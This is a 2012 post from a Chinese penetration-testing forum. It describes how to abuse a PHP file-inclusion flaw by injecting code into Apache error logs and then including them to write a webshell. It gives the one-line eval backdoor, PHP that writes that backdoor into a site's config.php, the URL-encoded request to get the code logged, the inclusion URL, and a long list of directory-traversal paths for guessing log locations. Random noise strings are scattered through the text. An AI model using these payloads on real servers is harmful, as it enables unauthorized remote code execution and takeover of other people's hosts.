找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php包含apache日志写马
返回列表 发新帖
查看: 2686|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
  N: Y6 H4 g. M" ]: I3 I  J5 d, S1 X# h2 S. f" O, A
比如还是这句一句话木马
& K9 L" {7 |7 p; c# [0 j/ N<?eval($_POST[cmd]);?>   
9 v! X& c& B. X, O8 n0 ?2 p& i! k( G) h& n$ r
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
2 G, y& {% ~; E8 \1 Ofopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 " s4 ?4 [$ ]% b. Q
5 c( A6 ~* o5 Z; c
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
! `: @9 p1 S+ V8 F; N0 Mfclose($fp);?>   //在config.php里写入一句木马语句
+ D: d, r9 z9 \- I6 P/ t
' [' ?: H% ?$ r! C9 ^$ l, Q% p; E+ e我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
, G# m2 ~, d' l6 T转换为
8 w/ Q' i; o, o" h6 C5 N6 Q%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F * k' `3 J7 N3 x' ?
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp ' I- O% X5 K% v2 J  J% \- s' K' l8 _
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B ! l9 h, I- P8 ?; E% a
fclose%28%24fp%29%3B%3F%3E   k2 f3 p! p0 r( F% ?$ _2 z# l
我们提交
' `! p. f$ ]% [http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
: y7 `% x; L' n; M& ?%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp 5 |1 D/ r; h7 M2 @0 K6 _
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B & v; b- Y: G3 f0 P% q- ?
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
8 v% I: i7 f& i. j6 O4 V# m$ K5 U+ u
这样就错误日志里就记录下了这行写入webshell的代码。 : h4 W2 s4 ~0 B* |2 x4 \2 u
我们再来包含日志,提交
, l; H( _% K6 Z! ?9 I$ Khttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log 4 V# p' e" F3 p  i  C( v6 A

3 Y1 v& ~1 b1 q, |! M这样webshell就写入成功了,config.php里就写入一句木马语句 / Y9 K  C8 l. h. O6 D
OK. " d$ z' z; ]3 C8 N+ j
http://www.xxx.com/forum/config.php这个就成了我们的webshell , P) B6 w& `( d9 ~4 k
直接用lanker的客户端一连,主机就是你的了。 9 z; @3 Q- P/ Y' ~- s
! f4 l2 w( a4 P4 ~2 y' H' \
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 * t4 d' |' i8 f, H6 R; j/ j

; `8 P( `3 Q" z; U# j& I其他的日志路径,你可以去猜,也可以参照这里。 - Y! M" b: \6 ^* \' P
../../../../../../../../../../var/log/httpd/access_log
9 x2 i- R" _8 j' n! U; |+ j../../../../../../../../../../var/log/httpd/error_log
/ y& l1 e0 z: L8 f- L../apache/logs/error.log 7 {/ x$ ]5 S. ^% Y
../apache/logs/access.log ' _8 N/ m0 |. i2 ]: I
../../apache/logs/error.log   G/ R) M9 ?- }3 [' z6 h, P
../../apache/logs/access.log
5 H5 Q: y! \' T5 F../../../apache/logs/error.log ( \8 x5 c' Z& E& T: Z
../../../apache/logs/access.log 5 L9 }4 a  |9 z; }9 D. H
../../../../../../../../../../etc/httpd/logs/acces_log 2 ~& g* r  V5 N" L6 P+ g3 }; f2 ^% F
../../../../../../../../../../etc/httpd/logs/acces.log
# k+ E* x# }6 s../../../../../../../../../../etc/httpd/logs/error_log
5 |/ d3 \" G* _( ?+ A../../../../../../../../../../etc/httpd/logs/error.log
( x' F8 {* b$ R' F& t/ J../../../../../../../../../../var/www/logs/access_log
3 [+ r7 T) J4 O( b/ M../../../../../../../../../../var/www/logs/access.log 5 l% s! {4 D* ?+ l2 F' @' p
../../../../../../../../../../usr/local/apache/logs/access_log ( Y: p  V: u) G9 O' x( S* t
../../../../../../../../../../usr/local/apache/logs/access.log
' s: O4 _: {' H* o../../../../../../../../../../var/log/apache/access_log . s- L  Z) S6 s' l& F& ]  m
../../../../../../../../../../var/log/apache/access.log
4 s! Y; u; V# C7 E../../../../../../../../../../var/log/access_log
9 a! [$ }% V# [3 I# `5 _../../../../../../../../../../var/www/logs/error_log 5 o" z* m- j# r: d$ ]7 }# j3 ~
../../../../../../../../../../var/www/logs/error.log
" J" c% Q. A$ E) d) [/ h* K# J../../../../../../../../../../usr/local/apache/logs/error_log
4 Z" I& U$ z8 A2 {9 P5 E: O../../../../../../../../../../usr/local/apache/logs/error.log $ h7 O* Q* Y7 s$ J2 D5 l6 s
../../../../../../../../../../var/log/apache/error_log
. P5 o2 l/ a4 \$ f2 N# e# G. {../../../../../../../../../../var/log/apache/error.log
" B* u1 E7 D- ?# i+ f+ o: V- z../../../../../../../../../../var/log/access_log 1 Y1 N) W0 G; H7 [' d. P  B# l
../../../../../../../../../../var/log/error_log
7 z1 d9 T+ s5 h: N1 m, U/var/log/httpd/access_log       4 c! e9 p# ~3 C  a8 h
/var/log/httpd/error_log     
: c8 r9 }, v! J4 s../apache/logs/error.log     / [8 D4 |8 m" c" x" p/ i
../apache/logs/access.log
4 z3 r: Y) r: o1 j2 w6 G../../apache/logs/error.log 4 T' y% k# U3 Z/ F. d, M/ n
../../apache/logs/access.log 3 L' I: x! h- D5 j! U  v
../../../apache/logs/error.log # ~0 e0 H& Y; c6 S4 i
../../../apache/logs/access.log ' T# K" s( {" u: v4 ~
/etc/httpd/logs/acces_log ; z) t: \& V# T/ o' g. ]. L8 y
/etc/httpd/logs/acces.log
9 j" M- l' t- p, ~/etc/httpd/logs/error_log 2 K% [' m9 A: v! M# i
/etc/httpd/logs/error.log ; t% e) h- l8 A! v4 H
/var/www/logs/access_log , F7 J; |, S- ]* E( V
/var/www/logs/access.log
4 N5 M3 L8 z5 D( i( n/ Z; V6 z6 f/usr/local/apache/logs/access_log
3 Y; k7 P  Z4 T" G/usr/local/apache/logs/access.log
7 ^+ x( u% k; B3 b: ]  J/var/log/apache/access_log
; [$ B' l" W# E+ [5 G8 c1 v/var/log/apache/access.log , ^" @" P" h3 e1 O
/var/log/access_log 9 R, u- L+ p4 T+ v
/var/www/logs/error_log
7 o  m0 S; J" B8 F, b( |, X1 g/var/www/logs/error.log
6 V) M' h& d; I/ U/ f/usr/local/apache/logs/error_log
2 n+ Q8 `, e* J; h  s9 z/usr/local/apache/logs/error.log , c: {' k7 j, d: S& z# [
/var/log/apache/error_log 0 D% o  d5 o/ N) @0 @. U  [
/var/log/apache/error.log
2 o  g$ c& U/ x6 S" m2 |3 g/var/log/access_log
" c* E+ q3 p: w, v# l& D* |; X/var/log/error_log
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表